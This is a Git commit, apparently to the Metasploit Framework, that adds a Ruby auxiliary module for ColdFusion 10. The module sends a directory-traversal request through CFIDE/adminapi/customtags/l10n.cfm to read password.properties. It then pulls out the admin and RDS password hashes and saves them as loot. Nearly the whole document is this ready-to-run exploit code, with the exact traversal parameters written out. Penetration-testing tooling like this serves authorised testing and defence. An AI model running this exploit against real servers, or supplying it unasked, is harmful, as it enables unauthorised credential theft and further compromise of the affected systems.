Add EDB-25305 - That ColdFusion 10 sub0 0day stuff

wchen-r7 · wchen-r7 · commit 60299c2adb7d · 2013-05-12T21:23:53.000-05:00
This is just an aux module that extract passwords from password.properties. Yes, this can leverage a shell too, but obviously that's best implemented in rapid7#1737, or as a new exploit. We'll see.
diff --git a/modules/auxiliary/gather/coldfusion_pwd_props.rb b/modules/auxiliary/gather/coldfusion_pwd_props.rb
@@ -0,0 +1,88 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Auxiliary::Report
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => "ColdFusion 10 'password.properties' Hash Extraction",
+			'Description'    => %q{
+					This module uses a directory traversal vulnerability to extract information
+				such as password, rdspassword, and "encrypted" properties.
+			},
+			'References'     =>
+				[
+					[ 'EDB', '25305' ],
+				],
+			'Author'         =>
+				[
+					'HTP',
+					'sinn3r'
+				],
+			'License'        => MSF_LICENSE,
+			'DisclosureDate' => "May 7 2013"  #The day we saw the subzero poc
+		))
+
+		register_options(
+			[
+				OptString.new("TARGETURI", [true, 'Base path to ColdFusion', '/'])
+			], self.class)
+	end
+
+	def peer
+		"#{datastore['RHOST']}:#{datastore['RPORT']}"
+	end
+
+	def run
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri'      => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', 'customtags', 'l10n.cfm'),
+			'encode_params' => false,
+			'encode' => false,
+			'vars_get' => {
+				'attributes.id'            => 'it',
+				'attributes.file'          => '../../administrator/mail/download.cfm',
+				'filename'                 => '../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties',
+				'attributes.locale'        => 'it',
+				'attributes.var'           => 'it',
+				'attributes.jscript'       => 'false',
+				'attributes.type'          => 'text/html',
+				'attributes.charset'       => 'UTF-8',
+				'thisTag.executionmode'    => 'end',
+				'thisTag.generatedContent' => 'htp'
+			}
+		})
+
+		if res.nil?
+			print_error("#{peer} - Unable to receive a response")
+			return
+		end
+
+		rdspass   = res.body.scan(/^rdspassword=(.+)/).flatten[0] || ''
+		password  = res.body.scan(/^password=(.+)/).flatten[0]    || ''
+		encrypted = res.body.scan(/^encrypted=(.+)/).flatten[0]   || ''
+
+		if rdspass.empty? and password.empty?
+			# No pass collected, no point to store anything
+			print_error("#{peer} - No passwords found")
+			return
+		end
+
+		print_good("#{peer} - rdspassword = #{rdspass}")
+		print_good("#{peer} - password    = #{password}")
+		print_good("#{peer} - encrypted   = #{encrypted}")
+
+		p = store_loot('coldfusion.password.properties', 'text/plain', rhost, res.body)
+		print_good("#{peer} - password.properties stored in '#{p}'")
+	end
+
+end
